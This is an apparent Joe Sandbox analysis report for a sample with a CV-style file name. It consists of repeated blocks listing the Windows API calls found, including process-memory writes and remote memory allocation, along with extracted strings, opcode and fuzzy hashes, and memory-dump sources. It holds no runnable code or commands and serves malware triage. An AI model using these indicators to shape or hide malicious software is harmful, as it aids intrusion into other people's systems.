                                                                                            • Opcode ID: 9afc92da9fe9c17418a1d794ed1ed55f091cf7257b292e093922b87d5254f47c
                                                                                            • Instruction ID: ee57ecaefce8d0b317878eaf9a5557d6c4180dfec413eea559042364da113630
                                                                                            • Opcode Fuzzy Hash: 9afc92da9fe9c17418a1d794ed1ed55f091cf7257b292e093922b87d5254f47c
                                                                                            • Instruction Fuzzy Hash: 0F01D134500798ABEF309F10EE5EBA677B8FB00705F00055DB682A18F0DBF0AA85CB90
                                                                                            APIs
                                                                                            • EndPath.GDI32(?), ref: 000DB0BA
                                                                                            • StrokeAndFillPath.GDI32(?,?,0013E680,00000000,?,?,?), ref: 000DB0D6
                                                                                            • SelectObject.GDI32(?,00000000), ref: 000DB0E9
                                                                                            • DeleteObject.GDI32 ref: 000DB0FC
                                                                                            • StrokePath.GDI32(?), ref: 000DB117
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                            • String ID:
                                                                                            • API String ID: 2625713937-0
                                                                                            • Opcode ID: 13b2fa60dd71101f0085d2d2f87958e9abf80f734e930634ddbbfda45d713ec4
                                                                                            • Instruction ID: 6ffe86e49b29855653e7c0e96800671ee1af69a4101f4cc180b90c7d70e99ff3
                                                                                            • Opcode Fuzzy Hash: 13b2fa60dd71101f0085d2d2f87958e9abf80f734e930634ddbbfda45d713ec4
                                                                                            • Instruction Fuzzy Hash: 6BF01939000344EFDB219F69EC0C7583FA8AB017A2F688315F4A5469F0D7718AD6CF20
                                                                                            APIs
                                                                                            • CoInitialize.OLE32(00000000), ref: 0010F2DA
                                                                                            • CoCreateInstance.OLE32(0014DA7C,00000000,00000001,0014D8EC,?), ref: 0010F2F2
                                                                                            • CoUninitialize.OLE32 ref: 0010F555
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInitializeInstanceUninitialize
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 948891078-24824748
                                                                                            • Opcode ID: e0326fe36fc2e7417248cdd707451b8d0f6e613b9c6b8e4b4277f4c0787a580a
                                                                                            • Instruction ID: 7fd17c781a2eff6a96ee66626a5163a819689cf9f129db64f769b3fea63401cf
                                                                                            • Opcode Fuzzy Hash: e0326fe36fc2e7417248cdd707451b8d0f6e613b9c6b8e4b4277f4c0787a580a
                                                                                            • Instruction Fuzzy Hash: 9DA13B71104301AFD300EF64C891EAFB7E8EF98714F00495DF595972A2EB70EA49CB62
                                                                                            APIs
                                                                                              • Part of subcall function 000C660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C53B1,?,?,000C61FF,?,00000000,00000001,00000000), ref: 000C662F
                                                                                            • CoInitialize.OLE32(00000000), ref: 0010E85D
                                                                                            • CoCreateInstance.OLE32(0014DA7C,00000000,00000001,0014D8EC,?), ref: 0010E876
                                                                                            • CoUninitialize.OLE32 ref: 0010E893
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 2126378814-24824748
                                                                                            • Opcode ID: 49d5c07163838a4db83f805701a1e27431237fa3e072267846eddcf5fd69f012
                                                                                            • Instruction ID: 8a1ed06f32d98654776c1ca5c23ae268225b4402c84b61c1037468153b5d5707
                                                                                            • Opcode Fuzzy Hash: 49d5c07163838a4db83f805701a1e27431237fa3e072267846eddcf5fd69f012
                                                                                            • Instruction Fuzzy Hash: 12A15235604301AFCB10DF15C884E6EBBE5BF89314F048999F99A9B3A2CB71ED45CB91
                                                                                            APIs
                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 000E32ED
                                                                                              • Part of subcall function 000EE0D0: __87except.LIBCMT ref: 000EE10B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorHandling__87except__start
                                                                                            • String ID: pow
                                                                                            • API String ID: 2905807303-2276729525
                                                                                            • Opcode ID: e250111acb69dc1c16c9161277af81dcf705c0df93d0919e67254cab1a4fd528
                                                                                            • Instruction ID: 7e9aacece62d0e2d41f592bf2db2320d6ff88c1e0316459f93698cab09f8ad58
                                                                                            • Opcode Fuzzy Hash: e250111acb69dc1c16c9161277af81dcf705c0df93d0919e67254cab1a4fd528
                                                                                            • Instruction Fuzzy Hash: AA519E31A082C99ECB657B26C9057BE6FD49B41710F308D6CF0C5A72E9DF348EC89642
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0015DC50,?,0000000F,0000000C,00000016,0015DC50,?), ref: 00104645
                                                                                              • Part of subcall function 000C936C: __swprintf.LIBCMT ref: 000C93AB
                                                                                              • Part of subcall function 000C936C: __itow.LIBCMT ref: 000C93DF
                                                                                            • CharUpperBuffW.USER32(?,?,00000000,?), ref: 001046C5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper$__itow__swprintf
                                                                                            • String ID: REMOVE$THIS
                                                                                            • API String ID: 3797816924-776492005
                                                                                            • Opcode ID: aec6632339a59bb6a3ed8bfda225bdce8e2bf4d97788676f12c569eb84e32bb9
                                                                                            • Instruction ID: 3a057e41bf1e15c5e74281224f18d5f7a82a3d564b4943d16bfca461f9004f86
                                                                                            • Opcode Fuzzy Hash: aec6632339a59bb6a3ed8bfda225bdce8e2bf4d97788676f12c569eb84e32bb9
                                                                                            • Instruction Fuzzy Hash: 4E41B374A002499FCF04EFA4C8C1EADB7B5FF49304F148069EA56AB2A2DBB0DD41CB50
                                                                                            APIs
                                                                                              • Part of subcall function 0010430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000FBC08,?,?,00000034,00000800,?,00000034), ref: 00104335
                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 000FC1D3
                                                                                              • Part of subcall function 001042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,000FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00104300
                                                                                              • Part of subcall function 0010422F: GetWindowThreadProcessId.USER32(?,?), ref: 0010425A
                                                                                              • Part of subcall function 0010422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,000FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0010426A
                                                                                              • Part of subcall function 0010422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,000FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00104280
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000FC240
                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 000FC28D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                            • String ID: @
                                                                                            • API String ID: 4150878124-2766056989
                                                                                            • Opcode ID: 2b8a2a27861b27e70f5243098333e8be8732f4176a3773e71bd70805c64997a3
                                                                                            • Instruction ID: ace14ff8173501c067575e2e53aaf80d817f8b0dee1db76410b77ea2e8df1c34
                                                                                            • Opcode Fuzzy Hash: 2b8a2a27861b27e70f5243098333e8be8732f4176a3773e71bd70805c64997a3
                                                                                            • Instruction Fuzzy Hash: EA413B76A0021CAFDB10DBA4DD82EEEB7B8FB19300F004095FA85B7181DB716E45DB61
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0015DC00,00000000,?,?,?,?), ref: 0012A6D8
                                                                                            • GetWindowLongW.USER32 ref: 0012A6F5
                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0012A705
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Long
                                                                                            • String ID: SysTreeView32
                                                                                            • API String ID: 847901565-1698111956
                                                                                            • Opcode ID: c8265b7c0cbe7568dd26027c685d2c49cbf255d42b82a9c7defe70ed555284ee
                                                                                            • Instruction ID: 0e9d3dc88351371c5d110bf8ade4cdb8776cda94ca6472dcc817bc6b7e658400
                                                                                            • Opcode Fuzzy Hash: c8265b7c0cbe7568dd26027c685d2c49cbf255d42b82a9c7defe70ed555284ee
                                                                                            • Instruction Fuzzy Hash: 9731DE31200216AFDB218F38EC45BEA77A9EF49324F284329F875932E0D770E8608B54
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0012A15E
                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0012A172
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0012A196
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window
                                                                                            • String ID: SysMonthCal32
                                                                                            • API String ID: 2326795674-1439706946
                                                                                            • Opcode ID: b8bdbed1fd15c0479f6b88d7926e52861e6c3aee7f7937bceb90fef8759997a1
                                                                                            • Instruction ID: 2f1593889aed3c3eead0f96ae787048ef0a49c114adf5d1fc1d8f78004663efa
                                                                                            • Opcode Fuzzy Hash: b8bdbed1fd15c0479f6b88d7926e52861e6c3aee7f7937bceb90fef8759997a1
                                                                                            • Instruction Fuzzy Hash: 99219F32510228BBDF158F94DC42FEA3BB9EF48724F150214FA556B1D0D7B5AC61CBA0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0012A941
                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0012A94F
                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0012A956
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                            • String ID: msctls_updown32
                                                                                            • API String ID: 4014797782-2298589950
                                                                                            • Opcode ID: cf7f09d3b4c416665804fb02070a1bb452172ef209e76bc53296c5d9dddea8d7
                                                                                            • Instruction ID: 172d4b446abefd37b15dfd6a6c7a3589a58e176af4d4ad2836e714cee23071fb
                                                                                            • Opcode Fuzzy Hash: cf7f09d3b4c416665804fb02070a1bb452172ef209e76bc53296c5d9dddea8d7
                                                                                            • Instruction Fuzzy Hash: F121B2B5600219BFDB00DF14EC81DA737ADEF5A358B550059FA4497361DB70EC52CB61
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00129A30
                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00129A40
                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00129A65
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$MoveWindow
                                                                                            • String ID: Listbox
                                                                                            • API String ID: 3315199576-2633736733
                                                                                            • Opcode ID: 0e676df5009bb60a9ee1c9a436e33f567c4a95e32ca99c9b49748ea1bfd3b4bb
                                                                                            • Instruction ID: d31a00d2441293ee7cabd7c2fa72c0035bdcc07e34fb8ed658ea18ae2ecb6e18
                                                                                            • Opcode Fuzzy Hash: 0e676df5009bb60a9ee1c9a436e33f567c4a95e32ca99c9b49748ea1bfd3b4bb
                                                                                            • Instruction Fuzzy Hash: C021C532610228BFDF118F58EC85EBB3BAAEF89764F018129F945571A0C7719C6187A0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0012A46D
                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0012A482
                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0012A48F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend
                                                                                            • String ID: msctls_trackbar32
                                                                                            • API String ID: 3850602802-1010561917
                                                                                            • Opcode ID: 7488a65213c5a8d327531bd364bda8bf0dfc0a513eed4ca76679d0f96a5894d9
                                                                                            • Instruction ID: 4e6b3734d8e91cbb75fa69f72fc9babfc3089ce64ed19b7d4dac47aa8b6c711e
                                                                                            • Opcode Fuzzy Hash: 7488a65213c5a8d327531bd364bda8bf0dfc0a513eed4ca76679d0f96a5894d9
                                                                                            • Instruction Fuzzy Hash: D0110A71200258BFEF245F64DC45FEB37ADEF89754F064118FA4596091D3B1E821C720
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,000E2350,?), ref: 000E22A1
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 000E22A8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RoInitialize$combase.dll
                                                                                            • API String ID: 2574300362-340411864
                                                                                            • Opcode ID: 54783b75ec23c78c81ff94645c397249b94433d162524e773c118d12ef509297
                                                                                            • Instruction ID: 613db657f554f41784955abae4f599114e809d52eaea4c0eb8c01ad67f5c21fd
                                                                                            • Opcode Fuzzy Hash: 54783b75ec23c78c81ff94645c397249b94433d162524e773c118d12ef509297
                                                                                            • Instruction Fuzzy Hash: C5E01A74690304ABDF915F71EC4EB1A37A8BB45B22F504464F206E68F0CBB881C8CF04
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000E2276), ref: 000E2376
                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 000E237D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: RoUninitialize$combase.dll
                                                                                            • API String ID: 2574300362-2819208100
                                                                                            • Opcode ID: 29e4adeb34f43c8cc82cb34e5efd5981a01f544b0b1dc493c68a4a3c64bc4911
                                                                                            • Instruction ID: 0ffbbc2e36205d010241b8991e94e5582e66bf1cb6ff5a06228883fd3887896d
                                                                                            • Opcode Fuzzy Hash: 29e4adeb34f43c8cc82cb34e5efd5981a01f544b0b1dc493c68a4a3c64bc4911
                                                                                            • Instruction Fuzzy Hash: 17E0BF746847049FDBA25F61FD4DB053665B745B12F110454F14DE28B0C7B496C4CB14
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: LocalTime__swprintf
                                                                                            • String ID: %.3d$WIN_XPe
                                                                                            • API String ID: 2070861257-2409531811
                                                                                            • Opcode ID: 14c0e54391fe4ff286eb155b71dfbac1a5df6b7f6c6b7bc1e2fd51cb420dabf8
                                                                                            • Instruction ID: b87ec52d27905b355a9e2ae1903823c0f4efa3702c67e1406ddb6c0de853821b
                                                                                            • Opcode Fuzzy Hash: 14c0e54391fe4ff286eb155b71dfbac1a5df6b7f6c6b7bc1e2fd51cb420dabf8
                                                                                            • Instruction Fuzzy Hash: 5EE012B1804618DBCB149750DD05DF9737CAF04741F911093F986A1111D7359B94EA22
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,001221FB,?,001223EF), ref: 00122213
                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00122225
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressLibraryLoadProc
                                                                                            • String ID: GetProcessId$kernel32.dll
                                                                                            • API String ID: 2574300362-399901964
                                                                                            • Opcode ID: 6090fdb908068b33e52d0a1d16fe03770139a70abb7077651f30846cc79d56d8
                                                                                            • Instruction ID: 767b32f32f92b8334b293c34e72acca0621d82bfdf415d428fa81d3924cde9ae
                                                                                            • Opcode Fuzzy Hash: 6090fdb908068b33e52d0a1d16fe03770139a70abb7077651f30846cc79d56d8
                                                                                            • Instruction Fuzzy Hash: 88D0A738500722EFCB214F30F80860576E4EB07700B008419EC45E2560EB71D8C0C750
                                                                                            APIs
                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000000,000C42EC,?,000C42AA,?), ref: 000C4304
                                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 000C4316
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
